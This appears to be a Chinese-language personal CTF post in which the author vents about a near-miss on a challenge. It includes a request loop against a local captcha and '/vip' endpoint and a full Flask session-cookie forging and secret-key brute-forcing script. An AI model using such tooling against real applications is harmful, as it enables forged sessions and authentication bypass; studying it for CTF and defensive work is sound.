story

草了,就差一点,妈的

import requests
from utils.captcha import Captcha, generate_code

while True:
    headers = {
        "User-Agent": "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)",
        "Connection": "close",
        "Accept-Encoding": "gzip, deflate",
        "Accept-Language": "en",
        "Accept": "*/*"
    }
    
    gen = Captcha(200, 80)
    gen.generate()
    captcha = generate_code()
    
    requests.get("http://localhost:15000/captcha", headers=headers)
    
    rawBody = "{\"captcha\":\"" + captcha + "\"}"
    
    print(rawBody)
    
    session = requests.Session()
    
    headers2 = {
        "Accept": "*/*",
        "User-Agent": "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)",
        "Connection": "close",
        "Accept-Encoding": "gzip, deflate",
        "Accept-Language": "en",
        "Content-Type": "application/json"
    }
    
    response = session.post(
        "http://localhost:15000/vip",
        data=rawBody,
        headers=headers2
    )

    print(session.cookies.items())

就是模拟远程那个操作,把第二次生成的传过去
然后后面都是一样的了,本地也试过,唉,我这猪脑袋
我真的崩溃了
key是ass
!!!

谁懂我多绝望

瞎拼了个脚本

#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Author: Dionysus
# Usage: python3 fake-flask.py -sign "data" -s "secret_key"
#      : python3 fake-flask.py -unsign "session" -s "secret_key"
#      : python3 fake-flask.py -unsign "session" --path "path"
#      : python3 fake-flask.py -getdata "session"



import argparse
import base64
import zlib
from flask import Flask
import json
from flask.sessions import SecureCookieSessionInterface

class MockApp(object):
    def __init__(self, secret_key):
        self.secret_key = secret_key
class DecodeError(Exception):
    pass

def base64_decode(data):
    return base64.urlsafe_b64decode(data + '==')

def decrypt_session(session_data, secret_key):
    try:
        app = MockApp(secret_key)
        si = SecureCookieSessionInterface()
        s = si.get_signing_serializer(app)
        return s.loads(session_data)
    except:
        return None

def encrypt_session(data, secret_key):
    app = MockApp(secret_key)
    si = SecureCookieSessionInterface()
    s = si.get_signing_serializer(app)
    return s.dumps(data)

def try_all_keys(session_data, path):
    secret_keys = []
    with open(path, "r") as f:
        for line in f:
            secret_keys.append(line.strip())

    for secret_key in secret_keys:
        data = decrypt_session(session_data, secret_key)
        if data is not None:
            print(f"Success! The secret key is {secret_key}")
            print(f"The decrypted session data is {data}")
            return
    print("Failed! No valid secret key found")

def decode(value: str) -> dict:
    try:
        compressed = False
        payload = value

        if payload.startswith('.'):
            compressed = True
            payload = payload[1:]

        data = payload.split(".")[0]
        data = base64_decode(data)

        if compressed:
            data = zlib.decompress(data)

        data = data.decode("utf-8")

    except Exception as e:
        raise DecodeError(f'Failed to decode cookie: {e}')

    try:
        return json.loads(data)
    except json.JSONDecodeError as e:
        raise DecodeError(f'Failed to decode cookie: {e}')

def get_raw_data_from_session(session_data):
    try:
        raw_data = decode(session_data)
        return raw_data
    except DecodeError as e:
        return f"An error occurred: {str(e)}"


def main():
    parser = argparse.ArgumentParser(description='Encrypt or decrypt Flask session data')
    parser.add_argument('-unsign', '--unsign', help='Decrypt session data', default=None)
    parser.add_argument('-sign', '--sign', help='Encrypt data', default=None)
    parser.add_argument('-s', '--secret_key', help='Secret key for encryption/decryption', default=None)
    parser.add_argument('--path', help='Path to a file containing secret keys for decryption', default=None)
    parser.add_argument('-getdata', help='Get raw data from session', default=None)

    args = parser.parse_args()

    if args.getdata:
        raw_data = get_raw_data_from_session(args.getdata)
        print(f"Raw data in session: {raw_data}")
        return 
    
    if args.unsign:
        if args.path:
            try_all_keys(args.unsign, args.path)
        elif args.secret_key:
            decrypted_data = decrypt_session(args.unsign, args.secret_key)
            if decrypted_data is not None:
                print(f"Success! Decrypted session data is {decrypted_data}")
            else:
                print("Failed! Decryption unsuccessful.")
        else:
            print("Please provide either --secret_key or --path option for decryption.")
    elif args.sign:
        if args.secret_key:
            # 将输入字符串转换为一个字典
            data_dict = json.loads(args.sign)
            encrypted_data = encrypt_session(data_dict, args.secret_key)
            print(f"Encrypted session data: {encrypted_data}")
        else:
            print("Please provide --secret_key option for encryption.")
    else:
        print("Please provide either -unsign or -sign option.")

if __name__ == '__main__':
    main()

呼,累了

# Usage: python3 fake-flask.py -sign "data" -s "secret_key"

# : python3 fake-flask.py -unsign "session" -s "secret_key"

# : python3 fake-flask.py -unsign "session" --path "path"

# : python3 fake-flask.py -getdata "session"